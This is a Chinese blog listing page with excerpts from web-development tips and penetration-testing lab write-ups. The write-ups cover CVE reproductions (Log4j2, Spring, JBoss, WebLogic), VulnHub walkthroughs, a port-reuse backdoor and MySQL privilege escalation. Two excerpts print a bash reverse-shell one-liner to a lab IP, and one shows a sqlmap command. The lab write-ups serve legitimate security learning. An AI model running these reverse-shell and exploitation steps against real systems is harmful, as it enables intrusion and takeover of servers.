自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(42)
  • 收藏
  • 关注

转载 深入理解 HTTPS 工作原理,一文帮你搞懂 HTTPS 加密、解密、验证及数据传输过程

在上述过程中,客户端在拿到服务器的公钥后,会生成一个随机码 (用 KEY 表示,这个 KEY 就是后续双方用于对称加密的密钥),然后客户端使用公钥把 KEY 加密后再发送给服务器,服务器使用私钥将其解密,这样双方就有了同一个密钥 KEY,然后双方再使用 KEY 进行对称加密交互数据。使用对称密钥的好处是解密的效率比较快,使用非对称密钥的好处是可以使得传输的内容不能被破解,因为就算你拦截到了数据,但是没有对应的私钥,也是不能破解内容的。进行加密处理,对方收到被加密的信息后,再使用自己的私有密钥进行解密。

2022-10-28 11:50:44 1581 1

原创 pip运行报错:Fatal error in launcher: Unable to create process using

Fatal error in launcher: Unable to create process using '"e:\????\python3.8.8\python.exe" "E:\????\python3.8.8\Scripts\pip3.exe" -V': ???????????

2022-06-09 22:11:01 925

原创 kali安装empire过程中遇到的各种报错解决方案

运行reset.sh初始化时就会出现以下错误,提示没有flask模块

2022-06-09 15:32:30 2231 10

原创 (权限维持)端口复用原理

一个木马绑定到服务器的一个合法端口,当接收到来自客户端的请求时,会先判断自己的特定包格式,如果是自己的包则自己处理,如果不是再转发给合法端口,攻击人无需与目标服务器建立连接,从而达到隐藏后门的目的。......

2022-06-07 21:48:32 2187

原创 Linux命令行中单引号和双引号的区别

单引号属于强引用,意思就是单引号里面的字符只会被当成字符,不会做任何处理双引号属于弱引用,即双引号内部的字符会经过其他处理,比如一些特殊字符会被被系统当成运算符去执行

2022-06-07 12:58:19 941

原创 解决thinkphp5.1由于开启强制路由导致访问入口文件index.php失效的问题

在route/router.php下添加以下代码use think\facade\Route;Route::get('/', 'index/index/index');然后再访问http://localhost/tp5.1/public就不会再报路由未定义的错误了

2022-05-08 20:50:45 1061

原创 Spring Cloud Gateway Actuator API SpEL 代码注入漏洞复现 (CVE-2022-22947)

概念:什么是spring cloud?Spring Cloud是一系列框架的有序集合。它利用Spring Boot的开发便利性巧妙地简化了分布式系统基础设施的开发,如服务发现注册、配置中心、消息总线、负载均衡、断路器、数据监控等,都可以用Spring Boot的开发风格做到一键启动和部署。Spring Cloud并没有重复制造轮子,它只是将各家公司开发的比较成熟、经得起实际考验的服务框架组合起来,通过Spring Boot风格进行再封装屏蔽掉了复杂的配置和实现原理,最终给开发者留出了一套简单易懂、易

2022-04-25 21:06:58 3305

原创 Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)

漏洞复现启动vulhub靶场环境,出现下面的页面说明启动成功首先,先用nc监听1234端口需要将反弹shell的命令进行编码bash -i >& /dev/tcp/192.168.96.1/1234 0>&1编码脚本如下,直接复制改后缀名为.html打开即可<!DOCTYPE html><html><head> <title>java runtime exe...

2022-04-25 20:07:30 3754

原创 JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。漏洞复现启动环境docker-compose up -d该漏洞出现在/jbossmq-httpil/HTTPServerI.

2022-04-22 00:40:47 1604

原创 JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。漏洞复现启动环境该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化,采用其他反序列化利用链就可以了使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用

2022-04-22 00:32:52 1270

原创 Weblogic WLS Core Components 反序列化命令执行漏洞复现(CVE-2018-2628)

Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。漏洞产生原因:攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议

2022-04-21 22:30:31 483

原创 weblogic反序列化漏洞复现-XMLDecoder(CVE-2017-10271)

漏洞原因Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。影响版本10.3.6 12.1.3 12.2.1.1.0 12.2.1.2.漏洞复现启动vulhub靶场看到上面的页面说明启动成功先开启监听然后发送下面的数据包(反弹语句需要编码):POST /wls-wsat/CoordinatorPortTy.

2022-04-21 21:50:33 1151

原创 log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场)

搭建靶场:docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像搭建成功!利用漏洞已经漏洞存在的情况下,构造攻击payload执行命令反弹shellbash -i >& /dev/tcp/192.168.96.166/1234 0>&1由于...

2022-04-18 19:03:49 3178

原创 spring framework远程代码执行漏洞复现(CNVD-2022-23942 CVE-2022-22965)

3 月 30 日,国家信息安全漏洞共享平台(CNVD)接收到蚂蚁科技集团股份有限公司报送的 Spring 框架远程命令执行漏洞(CNVD-2022-23942)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。CNVD 对该漏洞的综合评级为“高危”。漏洞影响:JDK9+ 使用了 Spring 框架或衍生框架 Apache Tomcat 作为 Servlet 容器 spring-webmvc 或 spring-webflux 依赖 Spring Framework 版本 5.3.0..

2022-04-18 16:08:47 6944

转载 文件上传漏洞详解

Micro05932021-06-30 22:20:22 194785上传漏洞定义文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。上传漏洞危害1.上传文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,导致代码执行。2.上传文件是病毒或者木马时,主要用于诱骗用户.

2022-04-16 19:07:16 2104

原创 thinkphp解决unique验证与当前数据重复而验证不通过问题

只需要在验证的数据中加入id值一起验证即可这样验证器就会去排除当前id的数据进行验证

2022-04-13 16:29:49 821

原创 理解同源策略和解决跨域问题

1、什么是同源策略简单来说,就是域名、协议、端口相同,即为同源。同源策略是一种浏览器安全策略,规定JavaScript能读取哪些web网站的内容,从而保护网站的数据不被其他网站读取。保护用户在使用浏览器访问网站时,B网站不能读取用户存储在A网站的数据。2、同源策略的目的举个简单的例子:当我们使用浏览器去访问A网站时,如果是第一次登录需要输入账号密码,为了方便下次访问,而不需要输入账号密码,服务端会给我们返回一个凭证——cookie,当前浏览器就会将这个凭证存起来,当我们下次再用这个浏览器

2022-04-06 22:59:48 2778

原创 解决thinkphp不能正常显示百度富文本ueditor文本内容的问题

问题:当将ueditor的内容存入数据库,然后在前端页面调用该内容时,却无法正常显示,找了好久都没解决原因 :当使用thinkphp自带的方法去查询数据库的数据时,为防御xss等漏洞,会将取出的数据进行转义,导致html标签无法正常解析解决:在引入查询的ueditor内容时,在参数后面加raw取消转义<div id="content">{$info.content|raw}</div>思考: 使用这种方法是否会造成xss漏洞?一般

2022-03-24 23:24:43 1394

原创 采用原生js分页模板TurnPage实现分页查询thinkphp5.1数据

目的:由于thinkphp官方自带的翻页按钮太丑了,加上想用js实现,最重要的是,找前端的朋友帮忙做,他说这个实现之后也会跟模板不兼容,还说我不懂,我立马就查找资料搞起来第一步:js填充翻页按钮html:<div class="pagelist"></div> <script> //获取翻页div的节点 var wrapper = document.querySelector('.p..

2022-03-22 17:19:15 995

原创 (thinkphp5.1开发)利用layer的open框接收错误时报错Uncaught TypeError: Cannot read properties of null (reading ‘pare

问题:刚开始一直以为是前端的问题,花了好几个小时排查,最终定位到layer.open框的问题然后一步步跟踪,最后跟踪到验证器getError写错了就因为用了tab键补齐,就花了几个小时才找出问题所在,正确写法:...

2022-03-17 14:23:31 1167

原创 js 利用localStorage限制重复获取验证码

定义:localStorage是将session永久存储在本地用法:localStorage.setItem("key", "value"); //保存sessionlocalStorage.getItem('key'); //获取key字段的sessionlocalStorage.remove('key'); //删除key字段的sessionlocalStorage.clear(); //清除所以本地session通过js实现验证码获取限制:(60s内只能获取一次)

2022-03-13 18:51:36 967

原创 (PHP开发)thinkphp5 换网站图标icon无法显示问题

选择自己喜欢的图片(jpg、png都行)前往在线生成icon生成网站:https://www.bejson.com/ui/icomaker/将选择的图片生成图标,然后将图标放到public目录下修改视图文件,将图标路径换成相对路径即可...

2022-03-12 16:58:41 893

原创 (PHP开发)使用phpmailer插件邮件发送失败(报错SMTP Error: Could not authenticate或者Extension missing: openssl 解决方案)

问题:报错Extension missing: openssl解决方法:修改配置文件php.ini将extension=php_openssl.dll开启(去掉前面的分号就行)问题:报错SMTP Error: Could not authenticate解决方法:将邮箱登录密码换成授权码前往邮箱获取授权码:选择邮箱服务开启成功获取授权码修改代码,将邮箱密码换成授权码成功发送邮件!...

2022-03-12 16:36:10 2780 2

原创 (VulnHub靶机通关)breach系列:breach-2.1细节通关方法

靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip需要配置仅主机模式

2022-01-26 04:27:25 3513

原创 (VulnHub靶机通关)DC-9

靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip主机发现IP:192.168.43.192 80端口为开放状态,22端口是filtered状态web渗透访问80端口的web服务,打开Search界面,输入1' or 1=1 #存在sql注入burpsuite抓包然后保存为DC.txt,然后用sqlmap进行爆破爆库名python sqlmap.py -r "C:\Users\11989\Desktop\DC.

2022-01-23 01:59:18 611

原创 (vulnhub靶机通关)Breach系列:breach-1.0

靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip环境配置根据作者描述,靶机配置了一个静态IP地址(192.168.110.140),需要仅主机适配器配置此子网配置仅主机网卡为DHCP,子网地址192.168.110.0注意:类型为仅主机的网卡才可以VMware适配器改成以下地址靶机和kali网络选仅主机模式确实环境是否配置好环境搞好,直接开干!信息收集扫端口扫描.

2022-01-22 16:03:42 4206 2

原创 (vulhub靶机通关) XXE LAB: 1

靶机下载地址:https://download.vulnhub.com/xxe/XXE.zip信息收集:主机IP:192.168.43.48 开放了80端口目录扫描:发现robots.txt查看robots.txt,发现admin.php,还有一个xxe目录直接访问admin.php报404,应该是不在根目录扫描192.168.43.48/xxe目录,发现admin.php访问xxe,是一个登录页面,应该就是admin.php尝试弱口令和注入无果...

2022-01-16 18:27:18 2736

原创 (渗透学习)XXE漏洞原理 & 挖掘 & 利用 & 防御

1、什么是XML?xml和html结构类似,不同的是:XML 被设计用来传输和存储数据。HTML 被设计用来显示数据。XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素(1)什么是DTD?文档类型定义(DTD)可定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。① 内部的 DOCTYPE 声明:<!DOCTYPE 根元素 [元素声明]>如下就

2022-01-15 00:15:05 5475

原创 msf反弹shell成功,却无法建立会话处理办法

报错:Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).如果run的时候出现以下问题导致建立会话失败,可能是端口4444被占用了,在终端输入 “netstat -tulpen”,查看进程端口信息通过命令”fuser -k 端口号/tcp“,删除4444端口进程...

2022-01-07 17:18:05 4608 1

原创 (vulhub靶机通关)BoredHackerBlog: Social Network 2.0---hard_socnet2

靶机下载地址:BoredHackerBlog: Social Network 2.0 ~ VulnHub最终只拿到了本地权限,root权限的提升涉及逆向工程、缓冲区溢出的源码审计,还在摸索首先,必须保证靶机、kali是通过桥接模式在同一网段主机发现:打开kali,通过ifconfig查看主机网段nmap扫描网段:nmap 192.168.43.0/24找到靶机ip,开放了22、80、8000端口获取webshell:先访问80端口,是

2022-01-07 16:36:18 3488 2

原创 (提权)mysql提权--udf、mof、启动项

1、udf提权当获取到mysql的root权限,需要进行权限提升,可以尝试使用udf提权首先需要查看mysql是否有导入导出功能,如果secure_file_priv为null,则无法使用udf提权,如果value值为空,则可以继续尝试show variables like 'secure_file_priv'; secure_file_priv的value为null ,不允许导入导出 secure_file_priv的value为/dir/,只允许dir目录下导入导.

2022-01-05 01:19:48 1150

原创 (渗透学习)ysoserial工具使用--java反序列化漏洞利用

工具下载地址:https://github.com/angelwhu/ysoserial使用方法可参考:https://blog.csdn.net/weixin_34275734/article/details/92243836靶场webgoat---Insecure Deserializetion---5分析漏洞:题目给的数据是rO0AB开头,所以是经过了base64加密的java序列化对象。解码后是一段英文,百度翻译也没发现有啥用处:题目还给出了一个接收序列化数据的表单.

2022-01-03 19:00:23 13029 10

原创 IDEA 导入jar包&&引用环境搭建

1、导入jar包(1)下载需要的jar包(2)复制到项目中,路径随意,方便就行(3)File --> Project Structure --> Moudles --> 右边的+号 --> 选择图示JARs or directories(4)选择刚刚的jar包,点击确定并OK,成功导入2、引用jar包的类按照图示引用,需要特别注意的是:名字必须一致,如果文件名是org.apache.commons.collections4,那么引.

2021-12-31 17:32:56 1765

原创 (渗透学习)理解java反序列化漏洞原理---层序渐进

1、为什么要序列化?因为只有字节数据才能进行存储和传输,所以为了使对象(如class类)能够存储、传输,就需要将对象转成字节的形式存储:不需要的时候就序列化对象后的数据存入磁盘,需要的时候就反序列还原对象进行调用传输:当A想要用B的对象时,那么A需要将对象进行序列化传输给B,B接收之后进行反序列化还原调用2、如何序列化和反序列化?要求:只有实现了Serializable接口的对象才能被序列化,否则抛出异常,如:class MyObject implements Serializ

2021-12-31 00:55:11 4193 3

原创 (渗透学习)JWT绕过

1、什么是JWT参考文章:https://www.jianshu.com/p/576dbf44b2ae2、JWT验证绕过https://jwt.io/

2021-12-30 00:04:27 5436 4

原创 (渗透学习)--case when注入原理

语法:select * from users order by (case when (true/false)) then xxx else mmm end)为true时,以xxx排序,为false时,以mmm排序测试:webgoat靶场源码的排序语句:题目:需要利用case when注入得到hostname="webgoat-prd"的ip地址可以构造payload:(case when ((select substr(ip,1,1) from servers ..

2021-12-29 22:23:53 1701

原创 (渗透学习)理解sql语句中的or、and,以及sql注入中的运用

or 或and 与直接测试:users表数据or:查询user字段=admin的数据,只能查到user="admin"如果查询语句后面加一个or "123"="123",语句执行相当于select user from users where user="admin" or 1;打印的是user字段的所有数据,明显可以看出这里的or也是符合逻辑运算,a or b===>a并b所以语句user="admin" or 1执行结果为1最终语句变为sele

2021-12-29 17:51:04 6050

原创 多版本环境共存配置方法,适用于配置php、python...

配置环境变量:path将各版本的文件路径都添加到path然后将执行文件php.exe更改成自己想要的名字在命令行下根据更改的名字直接运行即可调用相应版本

2021-12-27 17:13:10 412

原创 (渗透学习)PHP 反序列化漏洞---魔术方法使用不当引发的后果

序列化:serialize()反序列化:unserialize()序列化对象:<?phpclass whatDo { var $x = "imz"; var $y = 10;}$obj = new whatDo();echo serialize($obj);?>输出:O:6:"whatDo":2:{s:1:"x";s:3:"imz";s:1:"y";i:10;}反序列化漏洞成因:在PHP中,当对象在被使用时,会自动触发魔术方法,如:..

2021-12-26 00:54:47 675

原创 (渗透学习)PHP($$)变量覆盖原理分析----变量覆盖漏洞

如下代码段:<?phpforeach (array("_COOKIE","_POST","_GET") as $_request){ foreach ( $$_request as $key => $value ){ $$key = $value }}?>首先将数组("_COOKIE","_POST","_GET")赋给$_request,即$_request = ("_COOKIE","_POST","_GET")然后拼接成...

2021-12-25 16:20:18 1342

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除